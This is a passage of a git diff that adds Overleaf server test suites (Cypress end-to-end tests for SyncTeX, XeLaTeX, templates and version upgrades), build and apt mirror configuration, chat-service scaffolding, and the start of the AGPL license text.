+ cy.findByText('\\maketitle') + .parent() + .type( + `\n\\pagebreak\n\\section{{}Section A}\n\\pagebreak\n\\section{{}Section B}\n\\pagebreak` + ) + recompile() + cy.log('wait for pdf-rendering') + cy.get('.pdf-viewer').within(() => { + cy.findByText(projectName) + }) + }) + + it('should sync to code', function () { + cy.log('navigate to \\maketitle using double click in PDF') + cy.get('.pdf-viewer').within(() => { + cy.findByText(projectName).dblclick() + }) + cy.get('.cm-activeLine').should('have.text', '\\maketitle') + + cy.log('navigate to Section A using double click in PDF') + cy.get('.pdf-viewer').within(() => { + cy.findByText('Section A').dblclick() + }) + cy.get('.cm-activeLine').should('have.text', '\\section{Section A}') + + cy.log('navigate to Section B using arrow button') + cy.get('.pdfjs-viewer-inner') + .should('have.prop', 'scrollTop') + .as('start') + cy.get('.pdf-viewer').within(() => { + cy.findByText('Section B').scrollIntoView() + }) + cy.get('@start').then((start: any) => { + waitUntilScrollingFinished('.pdfjs-viewer-inner', start) + }) + // The sync button is swapped as the position in the PDF changes. + // Cypress appears to click on a button that references a stale position. 
+ // Adding a cy.wait() statement is the most reliable "fix" so far :/ + cy.wait(1000) + cy.get('[aria-label^="Go to PDF location in code"]').click() + cy.get('.cm-activeLine').should('have.text', '\\section{Section B}') + }) + + it('should sync to pdf', function () { + cy.log('zoom in') + cy.findByText('45%').click() + cy.findByText('400%').click() + cy.log('scroll to top') + cy.get('.pdfjs-viewer-inner').scrollTo('top') + waitUntilScrollingFinished('.pdfjs-viewer-inner', -1).as('start') + + cy.log('navigate to title') + cy.findByText('\\maketitle').parent().click() + cy.get('[aria-label="Go to code location in PDF"]').click() + cy.get('@start').then((start: any) => { + waitUntilScrollingFinished('.pdfjs-viewer-inner', start) + .as('title') + .should('be.greaterThan', start) + }) + + cy.log('navigate to Section A') + cy.get('.cm-content').within(() => cy.findByText('Section A').click()) + cy.get('[aria-label="Go to code location in PDF"]').click() + cy.get('@title').then((title: any) => { + waitUntilScrollingFinished('.pdfjs-viewer-inner', title) + .as('sectionA') + .should('be.greaterThan', title) + }) + + cy.log('navigate to Section B') + cy.get('.cm-content').within(() => cy.findByText('Section B').click()) + cy.get('[aria-label="Go to code location in PDF"]').click() + cy.get('@sectionA').then((title: any) => { + waitUntilScrollingFinished('.pdfjs-viewer-inner', title) + .as('sectionB') + .should('be.greaterThan', title) + }) + }) + }) + } + + function checkRecompilesAfterErrors() { + it('recompiles even if there are LaTeX errors', function () { + login('user@example.com') + createProject('test-project') + const recompile = throttledRecompile() + cy.findByText('\\maketitle').parent().click() + cy.findByText('\\maketitle') + .parent() + .type('\n\\fakeCommand{} \n\\section{{}Test Section}') + recompile() + recompile() + cy.get('.pdf-viewer').should('contain.text', 'Test Section') + cy.get('.logs-pane').should('not.contain.text', 'No PDF') + }) + } + + function checkXeTeX() { + it('should be able to use XeLaTeX', function () { + createProject('XeLaTeX') + const recompile = throttledRecompile() + cy.log('wait for compile') + cy.get('.pdf-viewer').should('contain.text', 'XeLaTeX') + + cy.log('Check which compiler was used, expect pdfLaTeX') + cy.get('[aria-label="View logs"]').click() + cy.findByText(/This is pdfTeX/) + + cy.log('Switch compiler from pdfLaTeX to XeLaTeX') + cy.get('header').findByText('Menu').click() + cy.findByText('Compiler') + .parent() + .findByText('pdfLaTeX') + .parent() + .select('XeLaTeX') + cy.get('.left-menu-modal-backdrop').click() + + cy.log('Trigger compile with other compiler') + recompile() + + cy.log('Check which compiler was used, expect XeLaTeX') + cy.get('[aria-label="View logs"]').click() + cy.findByText(/This is XeTeX/) + }) + } + + function checkUsesDefaultCompiler() { + beforeEach(function () { + login('user@example.com') + }) + + it('should not offer TexLive images and use default compiler', function () { + createProject('sandboxed') + cy.log('wait for compile') + cy.get('.pdf-viewer').should('contain.text', 'sandboxed') + + cy.log('Check which compiler version was used, expect 2025') + cy.get('[aria-label="View logs"]').click() + cy.findByText(/This is pdfTeX, Version .+ \(TeX Live 2025\) /) + + cy.log('Check that there is no TeX Live version toggle') + cy.get('header').findByText('Menu').click() + cy.findByText('Word Count') // wait for lazy loading + cy.findByText(LABEL_TEX_LIVE_VERSION).should('not.exist') + }) + } + + describe('disabled in 
Server Pro', function () { + if (isExcludedBySharding('PRO_DEFAULT_2')) return + startWith({ pro: true }) + ensureUserExists({ email: 'user@example.com' }) + beforeEach(function () { + login('user@example.com') + }) + + checkUsesDefaultCompiler() + checkSyncTeX() + checkXeTeX() + checkRecompilesAfterErrors() + }) + + describe.skip('unavailable in CE', function () { + if (isExcludedBySharding('CE_CUSTOM_1')) return + startWith({ pro: false, vars: enabledVars, resetData: true }) + ensureUserExists({ email: 'user@example.com' }) + beforeEach(function () { + login('user@example.com') + }) + + checkUsesDefaultCompiler() + checkSyncTeX() + checkXeTeX() + checkRecompilesAfterErrors() + }) +}) diff --git a/server-ce/test/templates.spec.ts b/server-ce/test/templates.spec.ts new file mode 100644 index 0000000..bb58165 --- /dev/null +++ b/server-ce/test/templates.spec.ts @@ -0,0 +1,257 @@ +import { isExcludedBySharding, startWith } from './helpers/config' +import { ensureUserExists, login } from './helpers/login' +import { createProject } from './helpers/project' + +const WITHOUT_PROJECTS_USER = 'user-without-projects@example.com' +const ADMIN_USER = 'admin@example.com' +const REGULAR_USER = 'user@example.com' +const TEMPLATES_USER = 'templates@example.com' + +// Re-use value for "exists" and "does not exist" tests +const LABEL_BROWSE_TEMPLATES = 'Browse templates' + +describe('Templates', () => { + ensureUserExists({ email: TEMPLATES_USER }) + ensureUserExists({ email: WITHOUT_PROJECTS_USER }) + + let OVERLEAF_TEMPLATES_USER_ID: string + before(function () { + login(TEMPLATES_USER) + cy.visit('/') + cy.get('meta[name="ol-user_id"]').then(el => { + OVERLEAF_TEMPLATES_USER_ID = el.attr('content')! + }) + }) + + function varsFn() { + return { + OVERLEAF_TEMPLATES_USER_ID, + OVERLEAF_NEW_PROJECT_TEMPLATE_LINKS: + '[{"name":"All Templates","url":"/templates/all"}]', + } + } + + describe('enabled in Server Pro', () => { + if (isExcludedBySharding('PRO_CUSTOM_2')) return + startWith({ + pro: true, + varsFn, + }) + ensureUserExists({ email: REGULAR_USER }) + ensureUserExists({ email: ADMIN_USER, isAdmin: true }) + + it('should show templates link on welcome page', () => { + login(WITHOUT_PROJECTS_USER) + cy.visit('/') + cy.findByText(LABEL_BROWSE_TEMPLATES).click() + cy.url().should('match', /\/templates$/) + }) + + it('should have templates feature', () => { + login(TEMPLATES_USER) + const name = `Template ${Date.now()}` + const description = `Template Description ${Date.now()}` + + cy.visit('/') + createProject(name).as('templateProjectId') + + cy.get('header').findByText('Menu').click() + cy.findByText('Manage Template').click() + + cy.findByText('Template Description') + .click() + .parent() + .get('textarea') + .type(description) + cy.findByText('Publish').click() + cy.findByText('Publishing…').parent().should('be.disabled') + cy.findByText('Publish').should('not.exist') + cy.findByText('Unpublish', { timeout: 10_000 }) + cy.findByText('Republish') + + cy.findByText('View it in the template gallery').click() + cy.url() + .should('match', /\/templates\/[a-f0-9]{24}$/) + .as('templateURL') + + cy.findAllByText(name).first().should('exist') + cy.findByText(description) + cy.findByText('Open as Template') + cy.findByText('Unpublish') + cy.findByText('Republish') + cy.get('img') + .should('have.attr', 'src') + .and('match', /\/v\/0\//) + cy.findByText('Republish').click() + cy.findByText('Publishing…').parent().should('be.disabled') + cy.findByText('Republish', { timeout: 10_000 }) + cy.get('img', { 
timeout: 10_000 }) + .should('have.attr', 'src') + .and('match', /\/v\/1\//) + + // custom tag + const tagName = `${Date.now()}` + cy.visit('/') + cy.findByText(name) + .parent() + .parent() + .within(() => cy.get('input[type="checkbox"]').first().check()) + cy.get('.project-list-sidebar-react').within(() => { + cy.findAllByText('New Tag').first().click() + }) + cy.focused().type(tagName) + cy.findByText('Create').click() + cy.get('.project-list-sidebar-react').within(() => { + cy.findByText(tagName) + .parent() + .within(() => cy.get('.name').should('have.text', `${tagName} (1)`)) + }) + + // Check listing + cy.visit('/templates') + cy.findByText(tagName) + cy.visit('/templates/all') + cy.findByText(name) + cy.visit(`/templates/${tagName}`) + cy.findByText(name) + + // Unpublish via template page + cy.get('@templateURL').then(url => cy.visit(`${url}`)) + cy.findByText('Unpublish').click() + cy.url().should('match', /\/templates$/) + cy.get('@templateURL').then(url => + cy.visit(`${url}`, { + failOnStatusCode: false, + }) + ) + cy.findByText('Not found') + cy.visit('/templates/all') + cy.findByText(name).should('not.exist') + cy.visit(`/templates/${tagName}`) + cy.findByText(name).should('not.exist') + + // Publish again + cy.get('@templateProjectId').then(projectId => + cy.visit(`/project/${projectId}`) + ) + cy.get('header').findByText('Menu').click() + cy.findByText('Manage Template').click() + cy.findByText('Publish').click() + cy.findByText('Unpublish', { timeout: 10_000 }) + + // Should assign a new template id + cy.findByText('View it in the template gallery').click() + cy.url() + .should('match', /\/templates\/[a-f0-9]{24}$/) + .as('newTemplateURL') + cy.get('@newTemplateURL').then(newURL => { + cy.get('@templateURL').then(prevURL => { + expect(newURL).to.match(/\/templates\/[a-f0-9]{24}$/) + expect(prevURL).to.not.equal(newURL) + }) + }) + + // Open project from template + login(REGULAR_USER) + cy.visit('/templates') + cy.findByText(tagName).click() + cy.findByText(name).click() + cy.findByText('Open as Template').click() + cy.url().should('match', /\/project\/[a-f0-9]{24}$/) + cy.get('.project-name').findByText(name) + cy.get('header').findByText('Menu').click() + cy.findByText('Word Count') // wait for lazy loading + cy.findByText('Manage Template').should('not.exist') + + // Check management as regular user + cy.get('@newTemplateURL').then(url => cy.visit(`${url}`)) + cy.findByText('Open as Template') + cy.findByText('Unpublish').should('not.exist') + cy.findByText('Republish').should('not.exist') + + // Check management as admin user + login(ADMIN_USER) + cy.get('@newTemplateURL').then(url => cy.visit(`${url}`)) + cy.findByText('Open as Template') + cy.findByText('Unpublish') + cy.findByText('Republish') + cy.get('@templateProjectId').then(projectId => + cy.visit(`/project/${projectId}`) + ) + cy.get('header').findByText('Menu').click() + cy.findByText('Manage Template').click() + cy.findByText('Unpublish') + + // Back to templates user + login(TEMPLATES_USER) + + // Unpublish via editor + cy.get('@templateProjectId').then(projectId => + cy.visit(`/project/${projectId}`) + ) + cy.get('header').findByText('Menu').click() + cy.findByText('Manage Template').click() + cy.findByText('Unpublish').click() + cy.findByText('Publish') + cy.visit('/templates/all') + cy.findByText(name).should('not.exist') + + // check for template links, after creating the first project + cy.visit('/') + cy.findAllByRole('button') + .contains(/new project/i) + .click() + cy.findAllByText('All Templates') 
+ .first() + .parent() + .should('have.attr', 'href', '/templates/all') + }) + }) + + function checkDisabled() { + it('should not have templates feature', () => { + login(TEMPLATES_USER) + + cy.visit('/') + createProject('maybe templates') + + cy.get('header').findByText('Menu').click() + cy.findByText('Word Count') // wait for lazy loading + cy.findByText('Manage Template').should('not.exist') + + cy.visit('/templates', { failOnStatusCode: false }) + cy.findByText('Not found') + cy.visit('/templates/all', { failOnStatusCode: false }) + cy.findByText('Not found') + + // check for template links, after creating the first project + cy.visit('/') + cy.findAllByRole('button') + .contains(/new project/i) + .click() + cy.findAllByText('All Templates').should('not.exist') + }) + + it('should not show templates link on welcome page', () => { + login(WITHOUT_PROJECTS_USER) + cy.visit('/') + cy.findByText(/new project/i) // wait for lazy loading + cy.findByText(LABEL_BROWSE_TEMPLATES).should('not.exist') + }) + } + + describe('disabled Server Pro', () => { + if (isExcludedBySharding('PRO_DEFAULT_2')) return + startWith({ pro: true }) + checkDisabled() + }) + + describe('unavailable in CE', () => { + if (isExcludedBySharding('CE_CUSTOM_1')) return + startWith({ + pro: false, + varsFn, + }) + checkDisabled() + }) +}) diff --git a/server-ce/test/tsconfig.json b/server-ce/test/tsconfig.json new file mode 100644 index 0000000..8d72981 --- /dev/null +++ b/server-ce/test/tsconfig.json @@ -0,0 +1,17 @@ +{ + "compilerOptions": { + "target": "esnext" /* Specify ECMAScript target version */, + "module": "es2020" /* Specify module code generation */, + "allowJs": true /* Allow JavaScript files to be compiled. */, + // "checkJs": true /* Report errors in .js files. */, + "jsx": "preserve" /* Specify JSX code generation */, + "noEmit": true /* Do not emit outputs. */, + "strict": true /* Enable all strict type-checking options. */, + "moduleResolution": "node" /* Specify module resolution strategy */, + "esModuleInterop": true /* Enables emit interoperability between CommonJS and ES Modules via creation of namespace objects for all imports. Implies 'allowSyntheticDefaultImports'. */, + "skipLibCheck": true /* Skip type checking of declaration files. */, + "forceConsistentCasingInFileNames": true /* Disallow inconsistently-cased references to the same file. */, + "types": ["cypress", "node", "@testing-library/cypress"] + }, + "include": ["**/*.ts", "**/*.tsx"] +} diff --git a/server-ce/test/upgrading.spec.ts b/server-ce/test/upgrading.spec.ts new file mode 100644 index 0000000..16e0320 --- /dev/null +++ b/server-ce/test/upgrading.spec.ts @@ -0,0 +1,226 @@ +import { ensureUserExists, login } from './helpers/login' +import { isExcludedBySharding, startWith } from './helpers/config' +import { dockerCompose, runScript } from './helpers/hostAdminClient' +import { createProject, openProjectByName } from './helpers/project' +import { throttledRecompile } from './helpers/compile' +import { v4 as uuid } from 'uuid' + +const USER = 'user@example.com' +const PROJECT_NAME = 'Old Project' + +describe('Upgrading', function () { + if (isExcludedBySharding('PRO_CUSTOM_3')) return + + function testUpgrade( + steps: { + version: string + vars?: Object + newProjectButtonMatcher?: RegExp + hook?: () => void + }[] + ) { + const startOptions = steps.shift()! 
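+ // The first entry in steps boots the starting (oldest) version; each remaining entry is applied in order as an in-place upgrade.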
+ + before(async () => { + cy.log('Create old instance') + }) + startWith({ + pro: true, + version: startOptions.version, + withDataDir: true, + resetData: true, + vars: startOptions.vars, + }) + before(function () { + cy.log('Create initial user after deleting it') + }) + ensureUserExists({ email: USER }) + before(() => { + cy.log('Populate old instance') + login(USER) + createProject(PROJECT_NAME, { + newProjectButtonMatcher: startOptions.newProjectButtonMatcher, + }) + const recompile = throttledRecompile() + cy.log('Wait for successful compile') + cy.get('.pdf-viewer').should('contain.text', PROJECT_NAME) + + cy.log('Increment the doc version three times') + for (let i = 0; i < 3; i++) { + cy.log('Add content') + cy.findByText('\\maketitle').parent().click() + cy.findByText('\\maketitle') + .parent() + .type(`\n\\section{{}Old Section ${i}}`) + + cy.log('Trigger full flush') + recompile() + cy.get('header').findByText('Menu').click() + cy.findByText('Source').click() + cy.get('.left-menu-modal-backdrop').click({ force: true }) + } + + cy.log('Check compile and history') + for (let i = 0; i < 3; i++) { + cy.get('.pdf-viewer').should('contain.text', `Old Section ${i}`) + } + cy.findByText('History').click() + for (let i = 0; i < 3; i++) { + cy.findByText(new RegExp(`\\\\section\{Old Section ${i}}`)) + } + }) + + for (const step of steps) { + before(() => { + cy.log(`Upgrade to version ${step.version}`) + + // Navigate away from editor to avoid redirect to /login when the next instance comes up (which slows down tests) + cy.visit('/project', {}) + }) + before(async function () { + cy.log('Graceful shutdown: flush all the things') + this.timeout(20 * 1000) + // Ideally we could use the container shutdown procedure, but it's too slow and unreliable for tests.
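+ // (A clean stop would presumably flush document-updater and project-history for us; the scripts below replicate that manually.)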
+ // TODO(das7pad): adopt the below after speeding up the graceful shutdown procedure on all supported releases + // await dockerCompose('stop', 'sharelatex') + + // For now, we are stuck with manually flushing things + await runScript({ + cwd: 'services/document-updater', + script: 'scripts/flush_all.js', + }) + await runScript({ + cwd: 'services/project-history', + script: 'scripts/flush_all.js', + }) + }) + startWith({ + pro: true, + version: step.version, + vars: step.vars, + withDataDir: true, + }) + + step.hook?.() + } + beforeEach(() => { + login(USER) + }) + + it('should list the old project', () => { + cy.visit('/project') + cy.findByText(PROJECT_NAME) + }) + + it('should open the old project', () => { + openProjectByName(PROJECT_NAME) + + cy.url().should('match', /\/project\/[a-fA-F0-9]{24}/) + cy.findByRole('navigation').within(() => { + cy.findByText(PROJECT_NAME) + }) + const recompile = throttledRecompile() + + cy.log('wait for successful compile') + cy.get('.pdf-viewer').should('contain.text', PROJECT_NAME) + cy.get('.pdf-viewer').should('contain.text', 'Old Section 2') + + cy.log('Add more content') + const newSection = `New Section ${uuid()}` + cy.findByText('\\maketitle').parent().click() + cy.findByText('\\maketitle').parent().type(`\n\\section{{}${newSection}}`) + + cy.log('Check compile and history') + recompile() + cy.get('.pdf-viewer').should('contain.text', newSection) + cy.findByText('History').click() + cy.findByText(/\\section\{Old Section 2}/) + cy.findByText(new RegExp(`\\\\section\\{${newSection}}`)) + }) + } + + const optionsFourDotTwo = { + version: '4.2', + vars: { + // Add core vars with old branding + SHARELATEX_SITE_URL: 'http://sharelatex', + SHARELATEX_MONGO_URL: 'mongodb://mongo/sharelatex', + SHARELATEX_REDIS_HOST: 'redis', + }, + newProjectButtonMatcher: /create first project/i, + } + describe('from 4.2 to latest', () => { + testUpgrade([optionsFourDotTwo, { version: 'latest' }]) + }) + describe('from 5.0 to latest', () => { + testUpgrade([{ version: '5.0' }, { version: 'latest' }]) + }) + describe('doc version recovery', () => { + testUpgrade([ + optionsFourDotTwo, + { + version: '5.0.1-RC1', + hook() { + before(function () { + login(USER) + cy.visit('/') + cy.findByText(PROJECT_NAME).click() + const recompile = throttledRecompile() + + cy.log('Make a change') + cy.findByText('\\maketitle').parent().click() + cy.findByText('\\maketitle') + .parent() + .type('\n\\section{{}FiveOOne Section}') + + cy.log('Trigger flush') + recompile() + cy.get('.pdf-viewer').should('contain.text', 'FiveOOne Section') + + cy.log('Check for broken history, i.e. not synced with latest edit') + cy.findByText('History').click() + cy.findByText(/\\section\{Old Section 2}/) // wait for lazy loading + cy.findByText(/\\section\{FiveOOne Section}/).should('not.exist') + }) + }, + }, + { + version: 'latest', + hook() { + before(async function () { + this.timeout(20_000) + const needle = 'Finished resyncing history for all projects.' + for (let i = 0; i < 30; i++) { + const { stdout } = await dockerCompose('logs', 'sharelatex') + if (stdout.includes(needle)) { + return + } + await new Promise(resolve => setTimeout(resolve, 500)) + } + const { stdout } = await dockerCompose('logs', 'sharelatex') + expect(stdout).to.contain( + needle, + 'Doc version recovery did not finish yet.' + ) + }) + + before(function () { + login(USER) + cy.visit('/') + cy.findByText(PROJECT_NAME).click() + + cy.log( + 'The edit that was made while the history was broken should be there now.' 
+            )
+            cy.findByText('History').click()
+            cy.findByText(/\\section\{FiveOOne Section}/)
+
+            // TODO(das7pad): restore after https://github.com/overleaf/internal/issues/19588 is fixed.
+            // cy.log('Check indicator of force resync')
+            // cy.findByText('Overleaf History System')
+          })
+        },
+      },
+    ])
+  })
+})
diff --git a/server-ce/ubuntu.sources b/server-ce/ubuntu.sources
new file mode 100644
index 0000000..ea29354
--- /dev/null
+++ b/server-ce/ubuntu.sources
@@ -0,0 +1,39 @@
+Types: deb
+URIs: https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports
+Suites: noble noble-updates noble-backports
+Components: main restricted universe multiverse
+Signed-By: /usr/share/keyrings/ubuntu-archive-keyring.gpg
+
+# The source-code (deb-src) mirror is commented out by default to speed up apt update; uncomment it if needed
+# Types: deb-src
+# URIs: https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports
+# Suites: noble noble-updates noble-backports
+# Components: main restricted universe multiverse
+# Signed-By: /usr/share/keyrings/ubuntu-archive-keyring.gpg
+
+# The security update sources below include both the official archive and the mirror configuration; adjust the comments to switch between them if needed
+Types: deb
+URIs: http://ports.ubuntu.com/ubuntu-ports/
+Suites: noble-security
+Components: main restricted universe multiverse
+Signed-By: /usr/share/keyrings/ubuntu-archive-keyring.gpg
+
+# Types: deb-src
+# URIs: http://ports.ubuntu.com/ubuntu-ports/
+# Suites: noble-security
+# Components: main restricted universe multiverse
+# Signed-By: /usr/share/keyrings/ubuntu-archive-keyring.gpg
+
+# Pre-release (proposed) sources; enabling them is not recommended
+
+# Types: deb
+# URIs: https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports
+# Suites: noble-proposed
+# Components: main restricted universe multiverse
+# Signed-By: /usr/share/keyrings/ubuntu-archive-keyring.gpg
+
+# # Types: deb-src
+# # URIs: https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports
+# # Suites: noble-proposed
+# # Components: main restricted universe multiverse
+# # Signed-By: /usr/share/keyrings/ubuntu-archive-keyring.gpg
\ No newline at end of file
diff --git a/services/chat/.gitignore b/services/chat/.gitignore
new file mode 100644
index 0000000..f0cf94b
--- /dev/null
+++ b/services/chat/.gitignore
@@ -0,0 +1,12 @@
+**.swp
+
+public/build/
+
+node_modules/
+
+plato/
+
+**/*.map
+
+# managed by dev-environment$ bin/update_build_scripts
+.npmrc
diff --git a/services/chat/.mocharc.json b/services/chat/.mocharc.json
new file mode 100644
index 0000000..dc3280a
--- /dev/null
+++ b/services/chat/.mocharc.json
@@ -0,0 +1,3 @@
+{
+  "require": "test/setup.js"
+}
diff --git a/services/chat/.nvmrc b/services/chat/.nvmrc
new file mode 100644
index 0000000..0254b1e
--- /dev/null
+++ b/services/chat/.nvmrc
@@ -0,0 +1 @@
+20.18.2
diff --git a/services/chat/Dockerfile b/services/chat/Dockerfile
new file mode 100644
index 0000000..14056c2
--- /dev/null
+++ b/services/chat/Dockerfile
@@ -0,0 +1,27 @@
+# This file was auto-generated, do not edit it directly.
+# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +FROM node:20.18.2 AS base + +WORKDIR /overleaf/services/chat + +# Google Cloud Storage needs a writable $HOME/.config for resumable uploads +# (see https://googleapis.dev/nodejs/storage/latest/File.html#createWriteStream) +RUN mkdir /home/node/.config && chown node:node /home/node/.config + +FROM base AS app + +COPY package.json package-lock.json /overleaf/ +COPY services/chat/package.json /overleaf/services/chat/ +COPY libraries/ /overleaf/libraries/ +COPY patches/ /overleaf/patches/ + +RUN cd /overleaf && npm ci --quiet + +COPY services/chat/ /overleaf/services/chat/ + +FROM app +USER node + +CMD ["node", "--expose-gc", "app.js"] diff --git a/services/chat/LICENSE b/services/chat/LICENSE new file mode 100644 index 0000000..ac8619d --- /dev/null +++ b/services/chat/LICENSE @@ -0,0 +1,662 @@ + + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. 
This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. 
+ + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. 
+ + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. 
+ + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding 